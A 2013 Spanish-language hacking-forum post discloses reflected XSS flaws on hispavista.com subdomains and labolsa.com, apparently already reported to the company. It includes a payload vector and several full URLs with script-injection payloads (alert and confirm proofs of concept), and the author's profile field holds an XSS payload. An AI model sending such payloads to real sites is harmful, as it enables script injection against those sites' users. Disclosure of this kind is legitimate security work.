comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XSS Reflejado *.hispavista.com & mx.*.hispavista.com

  • 0 Respuestas
  • 1221 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
    • Ver Perfil
    • Twitter
  • Skype: migueljimeno96
  • Twitter: "><<img src=y onerror=prompt();>
« en: Junio 17, 2013, 12:36:34 pm »
Buenas a todos.
Se trata de un XSS reflejado en TODOS los dominios de la empresa.

Para no publicar imágenes puesto a que son demasiados dejaré un par de ejemplos y el vector utilizado.

El vector será:
Código: You are not allowed to view links. Register or Login
"/><svg/onload=confirm(/Jimeno/.source);>Estado: REPORTADOS

Unos ejemplos del fallo:
Código: You are not allowed to view links. Register or Login
http://buscar.hispavista.com/?q=%22%2F%3E%3Csvg%2Fonload%3Dconfirm%280%29%3B%3E
http://buscar.hispavista.com/?q=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&str=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&cadena=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22
labolsa.com/buscador/?cadenaBusqueda=""%3B<%2Fscript><script>alert(0)<%2Fscript><"&buscar=Buscar
http://turismo.hispavista.com/buscar/?q=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&Submit=Buscar+en+Turismo&cadena=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&str=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22
http://paginasamarillas.hispavista.com/index.phtml?cadena=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&Submit=Buscar+en+P%E1g.+amarillas&oculto=SPAIN&str=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22
http://buscar.hispavista.com/?q=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E&Submit=Buscar
Hay muchos más, estos son unos ejemplos.
AFECTA A TODO EL SERVIDOR.
Saludos.
Contacto: @migueljimeno96 -

 

¿Te gustó el post? COMPARTILO!



[XSS Reflejado] - medialab-prado.es

Iniciado por HATI

Respuestas: 0
Vistas: 1072
Último mensaje Diciembre 19, 2016, 06:55:18 am
por HATI
[XSS Reflejado] priceangels

Iniciado por Cronos

Respuestas: 0
Vistas: 827
Último mensaje Septiembre 01, 2013, 09:44:53 am
por Cronos
[XSS REFLEJADO] - www.element14.com

Iniciado por HATI

Respuestas: 0
Vistas: 1104
Último mensaje Diciembre 30, 2016, 04:54:48 pm
por HATI
[XSS Reflejado] - www.serials.ws

Iniciado por HATI

Respuestas: 0
Vistas: 1150
Último mensaje Diciembre 06, 2016, 08:08:38 pm
por HATI
[XSS Reflejado] pandawill.com

Iniciado por Cronos

Respuestas: 1
Vistas: 1045
Último mensaje Septiembre 02, 2013, 09:17:48 pm
por Réplica1